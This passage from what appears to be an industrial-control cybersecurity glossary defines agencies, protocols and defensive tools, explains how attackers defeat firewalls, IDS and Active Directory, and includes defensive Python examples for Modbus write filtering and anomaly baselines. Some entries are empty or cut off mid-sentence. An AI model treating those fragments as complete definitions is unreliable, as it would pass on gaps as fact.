- Preventing proliferation of nuclear materials.
- Safeguarding nuclear infrastructure against physical and cyber threats.
Environmental Stewardship:
- Cleaning up hazardous waste from nuclear weapons production.
- Promoting energy efficiency and conservation.
Key Offices and Programs of DOE
Office of Cybersecurity, Energy Security, and Emergency Response (CESER):
- Focuses on improving the cybersecurity and resilience of energy systems.
- Collaborates with industry partners to prepare for, respond to, and recover from cyber incidents.
Energy Sector Cybersecurity Preparedness:
- Develops strategies to address emerging cyber threats in the energy domain.
- Supports energy providers with tools, guidelines, and training for cyber resilience.
Office of Science:
- Advances research in areas like artificial intelligence (AI) and cybersecurity applications for energy systems.
National Nuclear Security Administration (NNSA):
- Oversees cybersecurity measures for nuclear security operations.
Headquarters of DOE
The DOE is headquartered in Washington, D.C., with a network of national laboratories and field offices nationwide. The department is led by the Secretary of Energy, a Cabinet member appointed by the President.
Significance of DOE
The DOE plays a vital role in securing the nation’s energy infrastructure against cyber and physical threats, advancing clean energy initiatives, and addressing climate change. Its cybersecurity efforts ensure the resilience and reliability of the critical systems that power the nation.
United States Department of the Interior (DOI)
The Department of the Interior (DOI) is a U.S. federal agency responsible for managing the nation’s natural resources, public lands, wildlife, and cultural heritage. It also oversees relationships with Indigenous tribes and works to protect the environment. While traditionally focused on conservation and resource management, the DOI has increasingly incorporated cybersecurity into its responsibilities to safeguard critical infrastructure and sensitive data.
Primary Responsibilities of DOI
Natural Resource Management:
- Managing 480 million acres of public lands, including national parks, forests, and wildlife refuges.
- Overseeing energy resources, such as oil, gas, and renewable energy production on federal lands.
Wildlife Conservation:
- Protecting endangered species and their habitats.
- Managing national fish hatcheries and migratory bird conservation programs.
Cultural Preservation:
- Protecting historical landmarks and archaeological sites.
- Overseeing programs for cultural and heritage preservation.
Tribal Relations:
- Working with Indigenous tribes through the Bureau of Indian Affairs (BIA) to manage tribal lands and resources.
- Supporting tribal sovereignty and self-determination.
Cybersecurity in Resource and Land Management:
- Protecting the National Park Service (NPS) and other DOI-managed assets from cyber threats, including attacks on digital systems that monitor environmental conditions, visitor data, and operational technologies.
- Securing geospatial data and critical systems used for wildfire management, water resources, and energy infrastructure.
- Ensuring cybersecurity for systems managing permits and sensitive tribal data.
Key Offices and Programs of DOI
Office of the Chief Information Officer (OCIO):
- Leads DOI’s cybersecurity efforts by implementing policies and technologies to protect data and critical systems.
- Coordinates with federal cybersecurity initiatives to safeguard DOI’s IT and operational systems.
Bureau of Land Management (BLM):
- Oversees cybersecurity measures for energy infrastructure and public land management systems.
U.S. Geological Survey (USGS):
- Protects environmental and scientific data systems from cyber risks, including threats to Earth monitoring systems.
National Park Service (NPS):
- Secures systems that handle visitor data, park operations, and infrastructure.
Bureau of Indian Affairs (BIA):
- Works to secure sensitive tribal government data and operational systems.
Headquarters of DOI
The DOI is headquartered in Washington, D.C., and operates through a network of bureaus, regional offices, and field locations across the country. It is led by the Secretary of the Interior, a Cabinet member appointed by the President.
United States Department of Homeland Security (DHS)
The DHS, or Department of Homeland Security, is a U.S. federal agency established in response to the September 11, 2001, terrorist attacks. Its primary mission is to protect the United States from threats, including terrorism, natural disasters, cyber threats, and other security risks. DHS brings together several agencies and resources to coordinate national efforts on homeland security. Key agencies within DHS include:
- Federal Emergency Management Agency (FEMA): Handles disaster response and preparedness.
- Transportation Security Administration (TSA): Oversees airport and transportation security.
- U.S. Customs and Border Protection (CBP): Manages borders and customs enforcement.
- U.S. Citizenship and Immigration Services (USCIS): Administers the country’s immigration and naturalization system.
- Cybersecurity and Infrastructure Security Agency (CISA): Works to protect the country’s critical infrastructure from cyber and physical threats.
DHS’s functions are diverse, spanning from preventing terrorism and managing immigration to responding to natural disasters and cyber protection.
Design Basis Threat
A description of the most capable adversary whose attacks a site is required to defeat with a high degree of confidence.
Deterministic
Engineering-grade solutions are defined as those that deterministically eliminate unacceptable consequences of defined attacks for a predictable period of time, no matter how the threat environment evolves over that time.
Device Control
Software to prevent most or all uses of removable media, such as CD-ROMs and DVDs, as well as most or all uses of removable devices, such as USB drives, on a computer. Limitations: Device control is software. All software has vulnerabilities, and can be subverted. Attacks on device control systems include custom firmware on USB devices to launch USB-communications attacks on connected computers, and forging device identifiers or mechanisms to distinguish allowed from forbidden devices.
DHS Alert (IR-ALERT-H-16-056-01) (USA Alert)
What is it: Alert (IR-ALERT-H-16-056-01) – In response to cyber attacks against Ukrainian critical infrastructure, ICS-CERT issued an alert strongly encouraging organizations across all sectors to review and employ the mitigation strategies listed within the alert.
Organizations should isolate ICS networks from any untrusted networks, especially the Internet. Organizations should also limit Remote Access functionality wherever possible. Modems are especially insecure. Remote persistent vendor connections should not be allowed into the control network. Remote access should be operator controlled, time limited, and procedurally similar to “lock out, tag out.”
Relevancy to Unidirectional Gateways: If one-way communication can accomplish a task, use optical separation (“data diode”). If bidirectional communication is necessary, then use a single open port over a restricted network path. Users should implement “monitoring only” access that is enforced by data diodes, and not rely on “read only” access enforced by software configurations or permissions.
Waterfall Takeaways: Recognizes that interconnected networks are particularly attractive to a malicious actor, because a single point of compromise may provide extended access because of pre-existing trust established among interconnected resources.
Source: CISA
Distributed Control System (DCS)
A computerized system that controls industrial processes by distributing intelligence across the process, rather than using a single central unit. DCSs are used to automate industrial equipment and improve the safety, cost-effectiveness, and reliability of industrial processes.
Distributed Network Protocol 3 (DNP3)
Communication protocol that allows components of a Supervisory Control and Data Acquisition (SCADA) system to exchange information. DNP3 is used in industrial automation systems, particularly in utilities like electric and water companies. It’s also used in the gas and oil sectors.
Domain Name
In the Internet, a domain name is a string that identifies a realm of administrative autonomy, authority or control. Domain names are often used to identify services provided through the Internet, such as websites, email services and more.
Domain Name System (DNS)
The Domain Name System (DNS) is a hierarchical and distributed name service that provides a naming system for computers, services, and other resources on the Internet or other Internet Protocol (IP) networks. It associates various information with domain names assigned to each of the associated entities. Most prominently, it translates readily memorized domain names to the numerical IP addresses needed for locating and identifying computer services and devices with the underlying network protocols.
Download
Copying (data) from one computer system to another, typically over the internet.
Edge Devices
Any computing device that’s located near the edge of a network, usually near data sources or consumers. Edge devices are important for real-time applications and IoT deployments. They can:
- Process data locally
- Translate protocols
- Monitor and control machinery
- Provide enhanced services
Examples of edge devices include scanners, smartphones, medical devices, scientific instruments, autonomous vehicles, automated machines, routers, switches, firewalls, and integrated access devices (IADs).
Electric Power Research Institute (EPRI)
EPRI stands for Electric Power Research Institute, an independent, non-profit organization that conducts research and development to help the electricity sector
EKANS
EKANS ransomware is sophisticated malware targeting OT/ICS by identifying and infecting domain controllers.
Encryption
Encoding information so that only authorized parties can read the information.
EPA Cybersecurity for the Water Sector (Resource)
What is it: Cybersecurity resources for drinking water and wastewater systems in the United States.
Relevancy to Unidirectional Gateways: Potentially relevant as it emphasizes cybersecurity measures for water infrastructure, possibly including unidirectional gateways.
EPROM (erasable programmable read-only memory)
A read-only memory whose contents can be erased by ultraviolet light or other means and reprogrammed using a pulsed voltage.
Espionage (Cyber Espionage)
The use of computer networks to gain illicit access to confidential information, typically that held by a government or other organization.
Executable
A file or program able to be run by a computer.
Federal Energy Regulatory Commission (FERC)
The Federal Energy Regulatory Commission (FERC) is an independent agency that regulates the transmission of electricity, natural gas, and oil across state lines in the United States.
File System
A software mechanism that organizes and manages files on a storage device, such as a hard drive, solid state drive (SSD), or USB flash drive. It defines how files are named, stored, accessed, and organized.
Firewalls
What they are: Deep in the heart of every firewall is a router, because like routers, firewalls forward network messages from one network to another. Most firewalls are of course much more than routers – firewalls also contain software that looks at each message trying to pass through the router piece of the firewall and asks the question “is this message allowed?” If the software decides the message is allowed, it forwards the message; otherwise it most often drops the message. Modern / next-gen firewalls generally also have built-in VPNs, IDSs, IPSs, and “deep packet inspection” that claims to understand many IT and sometimes OT protocols and lets you craft rules such as “allow Facebook status updates, but do not allow images to be posted” and “allow writes to these Modbus registers, but not those.”
Where to use: Firewalls are used most effectively between networks at the same level of criticality. That is: within industrial / OT networks, within business networks, and between business networks and the Internet. Properly configured firewalls can stop or slow down many kinds of online cyber-sabotage attacks that originate on external networks.
Intrinsic Limitations: Firewalls control the flow of network packets – they do nothing about potentially contaminated USB drives, or laptops, or cell phones being carried into OT networks. Almost all modern, popular firewalls are complex and easily misconfigured in ways that are difficult to detect. Firewalls are intrinsically software, with vulnerabilities – for evidence of this look at your favorite firewall vendor’s website and count the number of security updates they’ve issued recently. Exploit these vulnerabilities and the protective function of the firewall can be subverted. There are many other ways that attackers defeat firewalls, for example disguising attacks inside packets that look legitimate to the firewall, so the firewall passes the attack through to the protected network. For evidence of how porous firewalls are, look at ransomware attacks. Almost all the hundreds of thousands of ransomware attacks that reach IT networks every year pass through the organization’s IT/Internet firewall.
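The “allow writes to these Modbus registers, but not those” rule above, and the application-level control described under Deep Packet Inspection, come down to parsing the protocol and deciding per message. The following Python is an added illustration written for this glossary, not code from Waterfall or from any firewall vendor. It assumes the firewall has already reassembled the TCP stream into whole Modbus/TCP frames, and it uses a constructed policy in which only holding registers 100 to 103 (imagined as operator setpoints) may be written from the less-trusted side; the function codes and frame layout are those of the Modbus specification. Malformed frames are dropped rather than forwarded, which is the failure mode that matters most for a filter of this kind.

```python
import struct
from dataclasses import dataclass
from typing import Set, Tuple

# Modbus function codes used by the example (values from the Modbus spec)
READ_HOLDING_REGISTERS = 0x03
WRITE_SINGLE_REGISTER = 0x06
WRITE_MULTIPLE_REGISTERS = 0x10

# Constructed policy (an assumption for this example): holding registers
# 100-103 hold setpoints the business network may write; all others are
# read-only from that side.
WRITABLE_REGISTERS = range(100, 104)


@dataclass
class ModbusRequest:
    transaction_id: int
    unit_id: int
    function: int
    data: bytes          # PDU bytes after the function code


def parse_modbus_tcp(frame: bytes) -> ModbusRequest:
    """Parse one Modbus/TCP request: 7-byte MBAP header followed by the PDU."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, proto, length, uid = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError("protocol identifier is not Modbus (0)")
    # The MBAP length field counts every byte after itself: unit id + PDU.
    if length != len(frame) - 6:
        raise ValueError("MBAP length does not match frame size")
    return ModbusRequest(tid, uid, frame[7], frame[8:])


def registers_written(req: ModbusRequest) -> Set[int]:
    """Return the holding-register addresses a write request would modify."""
    if req.function == WRITE_SINGLE_REGISTER:
        if len(req.data) != 4:
            raise ValueError("bad Write Single Register length")
        addr, _value = struct.unpack(">HH", req.data)
        return {addr}
    if req.function == WRITE_MULTIPLE_REGISTERS:
        if len(req.data) < 5:
            raise ValueError("bad Write Multiple Registers length")
        start, quantity, byte_count = struct.unpack(">HHB", req.data[:5])
        if byte_count != 2 * quantity or len(req.data) != 5 + byte_count:
            raise ValueError("register count does not match payload")
        return set(range(start, start + quantity))
    return set()


def inspect(frame: bytes) -> Tuple[str, str]:
    """Apply the write-register policy; returns ("allow" or "drop", reason)."""
    try:
        req = parse_modbus_tcp(frame)
    except ValueError as exc:
        return "drop", f"malformed frame: {exc}"
    if req.function == READ_HOLDING_REGISTERS:
        return "allow", "read of holding registers"
    if req.function in (WRITE_SINGLE_REGISTER, WRITE_MULTIPLE_REGISTERS):
        try:
            targets = registers_written(req)
        except ValueError as exc:
            return "drop", f"malformed write: {exc}"
        blocked = sorted(r for r in targets if r not in WRITABLE_REGISTERS)
        if blocked:
            return "drop", f"write to protected registers {blocked}"
        return "allow", f"write to permitted registers {sorted(targets)}"
    return "drop", f"function code 0x{req.function:02x} not in policy"


def build_frame(tid: int, unit: int, function: int, data: bytes) -> bytes:
    """Build a Modbus/TCP frame; used here only to construct sample traffic."""
    return struct.pack(">HHHB", tid, 0, 2 + len(data), unit) + bytes([function]) + data


# Constructed sample traffic, as a firewall would see it after TCP reassembly
SAMPLE_FRAMES = {
    "read_0_10": build_frame(1, 1, READ_HOLDING_REGISTERS, struct.pack(">HH", 0, 10)),
    "write_setpoint_101": build_frame(2, 1, WRITE_SINGLE_REGISTER, struct.pack(">HH", 101, 500)),
    "write_protected_7": build_frame(3, 1, WRITE_SINGLE_REGISTER, struct.pack(">HH", 7, 1)),
    "write_multi_102_103": build_frame(4, 1, WRITE_MULTIPLE_REGISTERS,
                                       struct.pack(">HHB", 102, 2, 4) + struct.pack(">HH", 1, 2)),
    "write_multi_103_104": build_frame(5, 1, WRITE_MULTIPLE_REGISTERS,
                                       struct.pack(">HHB", 103, 2, 4) + struct.pack(">HH", 1, 2)),
    "write_coil": build_frame(6, 1, 0x05, struct.pack(">HH", 3, 0xFF00)),
    "truncated": build_frame(7, 1, WRITE_SINGLE_REGISTER, struct.pack(">HH", 101, 500))[:-1],
}

if __name__ == "__main__":
    for name, frame in SAMPLE_FRAMES.items():
        verdict, reason = inspect(frame)
        print(f"{name:22s} {verdict:5s} {reason}")
```

Note what this filter does and does not give you, in line with the limitations listed above: it decides only on the bytes of each frame, so a write to a permitted register with a harmful value, or a protocol the parser does not understand, passes or fails on syntax alone, and the parser itself is software that must be kept patched.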
Firmware
Software built into the hardware of a computer system. Firmware is most often stored in read-only-memory chips, or flash memory built into a device.
Fuzzing
A kind of semi-automatic message-based attack. Legitimate messages in some communications protocol are changed in semi-random ways, so that the messages are no longer valid messages. Large numbers of different kinds of these variants are sent to a target computer, and the computer is observed. When the computer crashes or otherwise malfunctions, the recent message stream is replayed and examined to determine which variant caused the malfunction, and further research is done to determine if that malfunction causes a vulnerability which can be exploited.
Gazillion
Any unreasonably-large number.
Generating Unit
A set of equipment in an electric power plant focused on a single generator. For example, in a coal-fired plant, each generating unit is a single furnace, boiler, steam turbine and generator. In a hydro plant, a generating unit is a water turbine and generator.
GRC - Governance, Risk, and Compliance
Definition: Governance, Risk, and Compliance (GRC) is a strategic framework used by organizations to align their IT and business objectives while managing risks and meeting regulatory requirements. GRC encompasses three main components:
- Governance: Establishing policies and processes that ensure organizational goals are met.
- Risk Management: Identifying, assessing, and mitigating risks that could impact the organization’s ability to achieve its objectives.
- Compliance: Ensuring that the organization adheres to laws, regulations, and standards relevant to its operations.
Importance in Cybersecurity: GRC is critical in cybersecurity as it provides a structured approach to managing and mitigating risks associated with information security threats. By integrating governance, risk management, and compliance efforts, organizations can improve their overall security posture, respond effectively to incidents, and reduce the likelihood of data breaches or regulatory fines.
Example in OT Security: In an OT environment, GRC practices help ensure that industrial systems comply with industry standards and regulations while managing risks associated with operational technology. For example, a manufacturing plant might implement GRC processes to ensure that all safety protocols are followed, that employee access to control systems is appropriately governed, and that risks related to cyber threats or equipment failures are continuously assessed and mitigated. This holistic approach helps protect critical infrastructure and maintain operational integrity.
Hardware
Computer hardware includes the physical parts of a computer, such as the central processing unit (CPU), random access memory (RAM), motherboard, computer data storage, graphics card, sound card, and computer case. It includes external devices such as a monitor, mouse, keyboard, and speakers.
HILF
HILF is an acronym for “high-impact, low-frequency”. It’s a term used to describe an event that’s rare but has a significant impact when it does happen. HILF events are often unpredictable and irregular, and can cause a lot of disruption or catastrophic consequences.
Historian
A database optimized to store and manipulate large amounts of time-sequenced data, such as sensor readings from an industrial process.
HMI
Human Machine Interface – A software system used by a control system operator to summarize, visualize and control large numbers of sensors and actuators in an industrial control system.
Honeypot
A computer pretending to be an attack target, designed to lure attacks as part of detection and analysis efforts. Limitations: no emulation of a real system is perfect. When attackers or malware artifacts detect that they are interacting with a honeypot, they may call off the attack or take other measures to avoid detection.
Host Firewalls
What they are: Host firewalls are firewall software built into hosts. Instead of routing allowed messages from one network to another, host firewalls inspect traffic, decide if it is allowed, and permit allowed incoming messages deeper into the host for processing, or allow messages to leave the host destined for various networks.
Where to use: Host firewalls are recommended on all industrial equipment, but can be difficult to apply to existing installations, and difficult to manage as communications needs evolve, typically very slowly, over time.
Intrinsic Limitations: Host firewalls control the flow of network packets – they do nothing about potentially contaminated USB drives or DVD media entering a computer. Host firewalls are software, with vulnerabilities. Many host firewalls come with built in network IPS capabilities, with all the limitations of those systems. Modern attacks, however, rarely exploit host firewalls. More commonly, these attacks are carried into compromised hosts inside of encrypted, allowed connections to other hosts, users, and devices – connections that the host firewall is configured to permit.
Host Intrusion Detection Systems
What they are: Host IDS look at files, memory, kernel calls and other characteristics of computers (hosts), looking for indicators of an attack in progress. Signature-based systems match host characteristics against rules / signatures looking for a match. When a match is found, an alert is generated warning of a potential attack in progress. Anomaly-based systems use “machine learning” to look at patterns of host / memory / CPU activity and raise alerts when unusual changes are detected in these patterns. Vendors compete on patterns, and common patterns include file names, contents, and hashes, unusual patterns of execution such as connecting to another process in debug mode, requests to the computer user to escalate privilege, installing software and especially device drivers and many other patterns.
Where to use: Host IDS are used much less commonly than host IPS systems, such as anti-virus and application allow-listing systems. Host IDS or IPS are recommended for all industrial systems that tolerate or support these systems.
Intrinsic Limitations: All host IDS are software, with vulnerabilities known and unknown that can be exploited. Signature-based IDS can only detect “old” attacks – attacks that vendors have seen already and for which signatures have been produced, distributed, and installed. Anomaly-based IDS can detect attacks that “look” suspicious with respect to the characteristics the IDS is monitoring / learning. Attacks that “look” normal can go unreported. False alarms / false positives are a bane of all anomaly-based host IDS systems. System administrators often need to “tune” IDS systems to eliminate false alarms. “Low and slow” attacks can defeat IDS as well – attacks that change the “normal” behavior of compromised assets over time so slowly that normal machine learning and false alarm elimination processes “tune out” the attack indicators. All IDS are also susceptible to alert flooding attacks, where the attacker creates a “noisy” distraction in another part of the business that creates many high-priority alerts while pursuing the attacker’s real objective creating only a few low-priority alerts. And in the end, fast attacks risk bringing about unacceptable consequences despite IDS, because human or even automated incident response is too slow to prevent the consequence. Many low-level devices such as PLCs do not support the installation of third-party host IDS or run operating systems for which no such systems exist. Many parts of industrial control systems cannot tolerate the long file-system scans used by signature-based systems because of the performance impact of such scans, and critical systems may not have been tested for compatibility with arbitrary Host IDS or IPS systems.
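The “low and slow” limitation above is easy to see in code. The Python below is an added example written for this glossary, not code from any host IDS product. It assumes a hypothetical host agent that reports one metric per hour (here, a constructed count of new outbound connections), and compares two anomaly baselines: a rolling baseline that is re-learned from the previous 24 samples, and a baseline frozen from a known-clean day. On a constructed series that creeps upward by 0.2 per hour the rolling baseline never alerts, because each sample is only slightly above the recent past, while the frozen reference flags the drift once it clears the clean-period threshold. Both detect a sudden spike. The detection rule (mean plus three standard deviations, with the deviation floored at 1.0 to avoid alerting on noise in a flat baseline) is an assumption of the example.

```python
import statistics
from typing import List

# Constructed sample metric: hourly count of new outbound connections from one
# host, as reported by a hypothetical host agent. The first 24 samples are a
# known-clean day used as the frozen reference baseline.
CLEAN_REFERENCE: List[float] = [10, 11, 12, 11, 10, 11] * 4

# Low-and-slow scenario: after the clean day the count creeps up by 0.2 per
# hour for 100 hours, ending roughly three times above normal.
DRIFT_SERIES: List[float] = CLEAN_REFERENCE + [11 + 0.2 * j for j in range(100)]

# Fast scenario: the count jumps to 40 within a single hour.
SPIKE_SERIES: List[float] = CLEAN_REFERENCE + [40]


def alert_threshold(samples: List[float], k: float = 3.0) -> float:
    """Mean plus k standard deviations. The deviation is floored at 1.0 so a
    very flat baseline does not alert on ordinary noise (example assumption)."""
    return statistics.fmean(samples) + k * max(statistics.pstdev(samples), 1.0)


def rolling_alerts(series: List[float], window: int = 24, k: float = 3.0) -> List[int]:
    """Continuously re-learned baseline: each sample is judged only against
    the previous `window` samples, so the baseline follows slow drift."""
    return [i for i in range(window, len(series))
            if series[i] > alert_threshold(series[i - window:i], k)]


def fixed_alerts(series: List[float], reference: List[float], k: float = 3.0) -> List[int]:
    """Baseline frozen from a known-clean period; it does not follow drift."""
    threshold = alert_threshold(reference, k)
    return [i for i, value in enumerate(series) if value > threshold]


if __name__ == "__main__":
    print("drift, rolling baseline :", rolling_alerts(DRIFT_SERIES))
    print("drift, frozen reference :", fixed_alerts(DRIFT_SERIES, CLEAN_REFERENCE)[:3], "...")
    print("spike, rolling baseline :", rolling_alerts(SPIKE_SERIES))
    print("spike, frozen reference :", fixed_alerts(SPIKE_SERIES, CLEAN_REFERENCE))
```

In practice a detector keeps both views: the rolling baseline absorbs legitimate seasonal change, and the frozen reference (re-established only deliberately, after a clean re-baseline) is what catches a host whose “normal” has been walked away from its original state over days or weeks.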
HTTP
Hypertext Transfer Protocol (HTTP) is an application layer protocol in the Internet protocol suite model for distributed, collaborative, hypermedia information systems.
HTTPS
Hypertext Transfer Protocol Secure (HTTPS) is an extension of the Hypertext Transfer Protocol (HTTP). It uses encryption for secure communication over a computer network, and is widely used on the Internet. In HTTPS, the communication protocol is encrypted using Transport Layer Security (TLS) or, formerly, Secure Sockets Layer (SSL). The protocol is therefore also referred to as HTTP over TLS, or HTTP over SSL.
HVAC
Heating, ventilation, and air conditioning (HVAC) is the use of various technologies to control the temperature, humidity, and purity of the air in an enclosed space. Its goal is to provide thermal comfort and acceptable indoor air quality. HVAC system design is a subdiscipline of mechanical engineering, based on the principles of thermodynamics, fluid mechanics, and heat transfer.
IACS
Industrial Automation and Control Systems (IACS) – Also known as Operational Technology (OT), IACS are systems that control and measure things like the distribution of energy and gas, the functioning of locks and bridges, and the processing of nuclear material.
IAD
Integrated access device: A customer premises device that provides access to the internet and wide area networks.
IAEA
IAM
The purpose of IAM is to improve security and user experience, enable better business outcomes, and increase the viability of mobile and remote working and cloud adoption.
ICCP
ICS
IDS
IEC
IIoT
IIoT (Industrial Internet of Things) refers to interconnected sensors, instruments, and other devices networked together with industrial applications. It enables data collection, exchange, and analysis in industrial settings like manufacturing, energy, and infrastructure to improve efficiency, monitoring, and automation of industrial processes. Key applications include predictive maintenance, real-time production monitoring, supply chain optimization, quality control automation, and asset tracking.
INL
Idaho National Laboratory: INL is one of the U.S. Department of Energy’s (DOE’s) national laboratories. The laboratory performs work in each of DOE’s strategic goal areas: energy, national security, science and environment. INL is the nation’s leading center for nuclear energy research and development.
Instrumentation
Instrumentation Engineers are responsible for designing, developing, and maintaining the instruments and systems that measure, control, and monitor industrial processes. Their work is critical in ensuring the precision, efficiency, and safety of operations across various industries.
Interactive Remote Control
Device that allows users to control multiple electronic devices with a single operation. Remote controls use electronic signals or communication protocols to allow users to control devices from a distance.
IoT
Internet of Things, refers to the collective network of connected devices and the technology that facilitates communication between devices and the cloud, as well as between the devices themselves.
Identity and Access Management
What they are: Identity and Access Management (IAM) systems manage passwords and permissions. On Windows networks, Microsoft’s Active Directory products are the most widely used IAM systems. The term IAM can also refer to built-in users and permissions in software, hosts, and devices, not only external IAM services.
Where to use: Users, passwords and permissions are recommended for most industrial systems that tolerate such protections. Exceptions are equipment that is involved in or can trigger emergency shutdowns – as a rule, safety shutdowns must be triggerable by any person in an unsafe environment, whether or not they have or remember a password. Older systems such as PLCs, RTUs, and other embedded devices may support only one or a very limited number of users, permissions, and roles. Some systems, such as HMI workstations, have timing constraints that prohibit using operating system usernames, passwords, and permissions. Dangerous physical processes, such as petrochemical pipelines, can only be operated “blind” for a limited number of seconds before an emergency shutdown is required. It can take much longer than those limited number of seconds at shift change for the outgoing operator to shut down all applications and log out, so that a new operator can log back in and restart all the applications.
Intrinsic Limitations: All IAM systems are software, with vulnerabilities that can be exploited. Indeed, Active Directory (AD) systems are prime targets of remote-control attacks. The attackers find some way to steal AD administrator credentials or otherwise take over the AD server, create new accounts for themselves with universal access, and log in using those accounts to work their will upon the network of systems. IAM servers are not security tools – they are identity and permission management systems that urgently need to be secured.
IEC/ISA 62443 (Standard)
What is it: This standard addresses the issue of security for industrial automation and control systems (IACS), and outlines security requirements for control systems while assigning systems different security levels. Given that control systems are increasingly interconnected with non-IACS (OT) networks, the increased connectivity introduces greater risk of cyber attack against control system hardware and software. These vulnerabilities could lead to health, safety and environmental consequences. The cyber security approach for IACS needs to consider functional requirements, risk assessments and operational issues. IACS security goals are different from IT security goals: IACS security measures must prevent the loss of essential services and emergencies. IT is more focused on protecting information rather than human lives and physical assets. The main objective of the ISA 62443 series is to provide a framework that addresses security vulnerabilities in IACS and to apply the necessary defensive mitigations. The intended audience is the IACS communities, including asset owners, system integrators, product suppliers, service providers and compliance authorities. The goal is to define a common set of requirements to reach heightened security levels. There are seven foundational requirements for control systems: identification and authentication control, use control, system integrity, data confidentiality, restricted data flow, timely response to events, and resource availability. Security measures applied to these requirements shall not cause loss of protection, loss of control or loss of view.
Relevancy to Unidirectional Gateways: The standard mentions unidirectional gateways four times when prescribing security measures for restricted data flow, zone boundary protection, malicious code protection and denial of service protection. The standard recommends unidirectional gateways for networks controlling the most important and most highly protected assets within IACS. The standard also recommends segmenting control system networks from non-control system networks to reduce exposure to threats to control system reliability.
Waterfall Takeaway: The standard clearly states that the security goals and requirements for industrial control systems differ from those of IT networks. With the increased connectivity of business networks to control networks, new vulnerabilities present themselves. This standard recommends that networks protecting the most critical assets be identified as such and be protected by the most stringent methods, one of which is unidirectional gateways.
Source: Wikipedia Article
IEC-62443-3-3 (99.03.03) (Standard)
What is it: Security for industrial automation and control systems Part 3-3: This standard covers the system security requirements and security levels. The cyber security approach for IACS requires considering the functional requirements, risk assessments, and operational issues. IACS security goals are different from IT security goals: IACS security measures are focused on preventing the loss of essential services and emergencies. IT is more focused on protecting information rather than human lives and physical assets.
Relevancy to Unidirectional Gateways: The standard mentions unidirectional gateways four times when prescribing security measures for restricted data flow, zone boundary protection, malicious code protection and denial of service protection. The standard recommends unidirectional gateways for networks controlling the most important and most highly protected assets within IACS. The standard also recommends segmenting control system networks from non-control system networks to reduce exposure to threats to control system reliability.
Waterfall Takeaway: The standard clearly states that the security goals and requirements for industrial control systems differ from those of IT networks. With the increased connectivity of business networks to control networks, new vulnerabilities present themselves. This standard recommends that networks protecting the most critical assets be identified as such and be protected by the most stringent methods, one of which is unidirectional gateways.
Source: isa.org
IP
IP stands for “Internet Protocol,” which is the set of rules governing the format of data sent via the internet or local network. In essence, IP addresses are the identifier that allows information to be sent between devices on a network: they contain location information and make devices accessible for communication.
ISA SP99
A committee of the International Society of Automation (ISA) that develops standards and practices for industrial systems cybersecurity:
Purpose: To improve the security of industrial automation and control systems, including confidentiality, integrity, and availability
ISO
International Organization for Standardization is a worldwide federation of national standards bodies. ISO is a nongovernmental organization that comprises standards bodies from more than 160 countries, with one standards body representing each member country.
ISO/IEC 27001 (Standard)
Summary: Information security management systems
Relevancy to Unidirectional Gateways: Indirectly relevant as it outlines information security management systems that can include unidirectional gateways.
Source: ISO
Jamming
Definition: Jamming is a type of cyberattack where an attacker deliberately disrupts or interferes with wireless communications by overwhelming the network with noise or false signals, effectively “jamming” the communication channels. This can prevent devices from sending or receiving legitimate signals, causing service outages or communication delays.
Importance in Cybersecurity: Jamming attacks are particularly problematic in wireless networks, such as Wi-Fi, cellular, or radio frequency (RF) communications. In critical systems, jamming can lead to denial of service (DoS), disrupting communications and potentially causing system failures. Wireless jamming is a concern in environments where reliable communication is essential for safety and operational efficiency.
Example in OT Security: In OT environments, jamming attacks pose a significant threat, especially in industries that rely on wireless communication for monitoring and control, such as energy grids, oil and gas pipelines, or manufacturing plants. For example, a jamming attack on the wireless sensors or control systems of an industrial plant could prevent operators from receiving critical real-time data, leading to delayed responses to dangerous conditions or even causing equipment failure.
Kerberos
A computer network authentication protocol that verifies the identity of users and hosts on a network. Kerberos enables secure communication between devices on a network by authenticating users and preventing passwords from being sent over the internet.
Kernel
A kernel, in the context of computing, is essentially the core of an operating system. It is the fundamental layer that exists between the computer hardware and the software. The kernel is responsible for interacting with hardware, and it is often considered the nucleus of a computer’s operating system.
Keylogger
Definition: A keylogger is a type of malware or hardware device that records keystrokes on a keyboard without the user’s knowledge. Keyloggers capture everything typed, including passwords, emails, personal messages, and other sensitive information. They are commonly used by cybercriminals to steal credentials or monitor user activity.
Types of Keyloggers:
- Software-based keyloggers: These are malicious programs installed on a computer to capture and log keystrokes.
- Hardware-based keyloggers: These devices are physically attached to a keyboard or computer and record keystrokes without needing software.
Importance in Cybersecurity: Keyloggers are a significant threat because they can steal sensitive information without raising immediate suspicion. They are often used in phishing campaigns, insider attacks, or as part of broader espionage efforts. Keyloggers can be difficult to detect, especially if they are hardware-based or use advanced obfuscation techniques.
Example in OT Security: In an OT environment, a keylogger could be used to capture login credentials of engineers or operators who control critical systems, such as a SCADA system or a Human-Machine Interface (HMI). Once an attacker gains access to these systems through stolen credentials, they could manipulate processes, shut down systems, or cause physical damage to industrial equipment. This makes securing workstations and monitoring for keylogger activity essential in protecting OT systems.
Kiosk
Kiosk computers are self-service terminals that give users access to specific information or software on a computer. They are used to make interactions with customers faster by offering a self-service option that shortens the process.
KVM Switch
A KVM switch (KVM being an abbreviation for “keyboard, video, and mouse”) is a hardware device that allows a user to control multiple computers from one or more sets of keyboard, video monitor, and mouse.
Lateral Movement
Definition: Lateral movement refers to a tactic used by cyber attackers to move through a network after gaining initial access. Instead of targeting a specific endpoint, attackers move “laterally” across systems and devices within the network to escalate privileges, gain further access, or exfiltrate sensitive data. Lateral movement often involves compromising additional accounts, exploiting vulnerabilities, and using legitimate credentials to avoid detection.
Importance in Cybersecurity: Lateral movement is a key phase in many advanced cyberattacks, particularly Advanced Persistent Threats (APTs). Once an attacker gains a foothold, they aim to spread across the network to reach critical systems and data, often staying hidden for long periods while they gather intelligence or prepare for further attacks. Detecting lateral movement is vital for stopping attackers before they reach high-value targets.
Example in OT Security: In OT networks, lateral movement is especially dangerous because once attackers gain access to an edge device or less secure system, they can move toward more critical control systems like SCADA (Supervisory Control and Data Acquisition) or PLCs (Programmable Logic Controllers). An attacker moving laterally through an OT network could disrupt essential industrial processes or compromise safety systems, causing physical damage or service outages in industries like power generation, manufacturing, or transportation. This makes detecting and blocking lateral movement critical in OT security.
LAN - Local Area Network
Any network enclosed entirely within an industrial site’s physical security perimeter.
LIHF
Low Impact High Frequency refers to events that occur frequently and predictably and have minimal consequences and disruption.
Linux
